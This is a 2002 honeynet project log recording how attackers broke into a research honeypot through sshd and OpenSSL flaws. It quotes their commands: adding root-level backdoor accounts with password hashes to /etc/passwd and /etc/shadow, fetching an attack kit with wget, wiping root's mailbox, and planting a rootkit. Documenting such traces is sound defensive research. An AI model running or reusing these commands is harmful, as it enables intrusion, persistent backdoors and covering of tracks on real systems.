HoneyNet Project
Some Findings
- The project launched on 17th June 2002
- Before September, most hacking activities are ftp and ssh crc32 attacks
but none of them can successfully break into the honey pot. The IDS only
detected proxy scanning and some Nimda attempt from time to time.
September 7
Guest account login via telnet. After login, try ftp tools from his/her
site but failed (as the the honeynet firewall had cut all outgoing traffic at
that time). From ttysnoop log, we find that the hacker then try to build his/her local root exploit tools by cat
command.
<![CDATA[
bash-2.04$ cat >> imp-finger.c
/*
- Imperfection Security Presents -
Debian GNU/Linux cfingerd remote root exploit
From shakey, of Imperfection Security [07/99]
Exploits a problem reported on BUGTRAQ in Debian's
...
]]>
The following local exploit tools had been tried at the honeypot host:
imp-finger
ptrace24,
suk,
wuftp,
lpd,
localroot netkit-0.17-7 local root exploit,
linuxconf,
7350wurm,
bashack,
sambaroot1
September 16
Got the hacker ftp site file list. The hacker had
tried the hacking tools of bashack, linuxcon, sambaroot, wu-imap ... etc
September 19
Someone from Canada and Romania get into the root shell via sshd CRC32
overflow
vulnerability.
A root shell connection was established at port 12345 after the sshd
overflow. Here is the trace of the hacker activities in this root shell
connection.
<![CDATA[
w;..
echo "muie:x:0:501::/home/muie:/bin/bash">>/etc/passwd;..
echo "muie:$1$U4BxCX2h$pJFV/Gp7aKbJ4h.Ygd5eZ0:11948:0:99999:7::: ">>;/etc/shadow;..
cat /etc/passwd;..
echo newoneop | passwd &> /dev/null --stdin games;..
/usr/sbin/usermod &>; /dev/null -u 0 -o games;..
]]>
Hence two backdoor accounts (muie and game) were set as shown in the /etc/passwd
and /etc/shadow file
<![CDATA[
in /etc/passwd
muie:x:0:501::/home/muie:/bin/bash
in /etc/shadow
muie:$1$9oYCFsWF$3Nu4NL7OxOMNBJkw1IeWi0:11948:0:99999:7:::
]]>
The hacker accessed the honeypot by these backdoor accounts.
The last log shows:
<![CDATA[
muie pts/0 xx.xx.72.168 Thu Sep 19 05:06 - 05:46 (00:39)
muie pts/1 xx.xx.72.180 Thu Sep 19 03:45 - 03:50 (00:04)
games pts/0 xx.xx.72.180 Thu Sep 19 03:36 - 04:25 (00:49)
]]>
From the ~games/.bash_history file
<![CDATA[
id
ftp xxx.xx.ro
ftp xxx.xxx.236.42
ls
wget www.xxx.xxx.xxx.ro/kit.tgz
netstat
cat /etc/passwd
passwd muie
id
ftp users.xxx.ro
ftp xxx.xxx.236.41
rm -rf /var/spool/mail/root
touch /var/spool/mail/root
]]>
Here is the kit.tgz list.
Another sshd hacking via sshd CRC32 overflow on that day. The activities
carried out by this hacker is:
- Try to install wget by rpm -ivh --force a_rpm_ftp_site
- wget the kit.tgz from his/her site
- create hidden directory /dev/" " and try to get psyBNC rpm from a rmp site
The previous hacker came back and try to download the psy.tgz.
Here is the trace.
September 26
Hacker from Argentina hacked in through sshd CRC32 overflow vulnerability.
Now the root shell connection port is 3879 not 12345. The backdoor account still
use muie but with different password
<![CDATA[
Now the /etc/passwd has two backdoor accounts muie
muie:x:0:501::/home/muie:/bin/bash
muie:x:0:501::/home/muie:/bin/bash
but with different password in /etc/shadow
muie:$1$9oYCFsWF$3Nu4NL7OxOMNBJkw1IeWi0:11948:0:99999:7:::
muie:$1$U4BxCX2h$pJFV/Gp7aKbJ4h.Ygd5eZ0:11948:0:99999:7:::
]]>
Hacker from Mexico try to hack in through sshd CRC32 overflow but not success
as the honeynet firewall had cut the traffic
October 26
Hacker from Seattle hacked into the honeypot by openssl vulnerability and
successfully install rootkit. Here is the trace.
Here is the list of the test packets
<![CDATA[
[root@pc11 ...]# ls -Fa
./ ../ bang* test/
[root@pc11 ...]# ls -Fa test
./ adore-0.42/ crontab-entry find* in.telnetd* install.log lsof* muie.tgz pstree* sshd/ syslogd* vadim*
./ chsh* du* functions* inet* killall* md5bd* netstat* sense* stealth* syslogd.init* xinetd*
adore-0.34/ clean* filez/ ifconfig* install* ls* md5sum* ps* slice* sysinfo* top*
]]>
Here is the install file.
Here is the honeypot kernel files in /boot
<![CDATA[
root@pc11 /boot]# ls -ltr
total 5068
-rw-r--r-- 1 root root 662413 Aug 23 2000 vmlinuz-2.2.16-22enterprise
-rwxr-xr-x 1 root root 1756599 Aug 23 2000 vmlinux-2.2.16-22enterprise
-rw-r--r-- 1 root root 213782 Aug 23 2000 System.map-2.2.16-22enterprise
-rw-r--r-- 1 root root 627392 Aug 23 2000 vmlinuz-2.2.16-22
-rwxr-xr-x 1 root root 1621492 Aug 23 2000 vmlinux-2.2.16-22
-rw-r--r-- 1 root root 11773 Aug 23 2000 module-info-2.2.16-22
-rw-r--r-- 1 root root 200285 Aug 23 2000 System.map-2.2.16-22
-rw-r--r-- 1 root root 640 Aug 23 2000 os2_d.b
-rw-r--r-- 1 root root 23108 Aug 23 2000 message
-rw-r--r-- 1 root root 612 Aug 23 2000 chain.b
-rw-r--r-- 1 root root 5824 Aug 23 2000 boot.b
-rw-r--r-- 1 root root 0 Aug 25 2000 kernel.h-2.4.0
-rw-r--r-- 1 root root 405 Jun 6 16:29 kernel.h-2.2.16
lrwxrwxrwx 1 root root 27 Jun 6 23:10 vmlinuz -> vmlinuz-2.2.16-22enterprise
lrwxrwxrwx 1 root root 31 Jun 6 23:10 module-info -> module-info-2.2.16-22enterprise
lrwxrwxrwx 1 root root 15 Jun 6 23:12 kernel.h -> kernel.h-2.2.16
-rw------- 1 root root 10752 Jun 7 00:24 map
-rw-r--r-- 1 root root 512 Jun 7 00:24 boot.0300
lrwxrwxrwx 1 root root 20 Oct 30 11:32 System.map -> System.map-2.2.16-22
]]>
Adventure still continue ...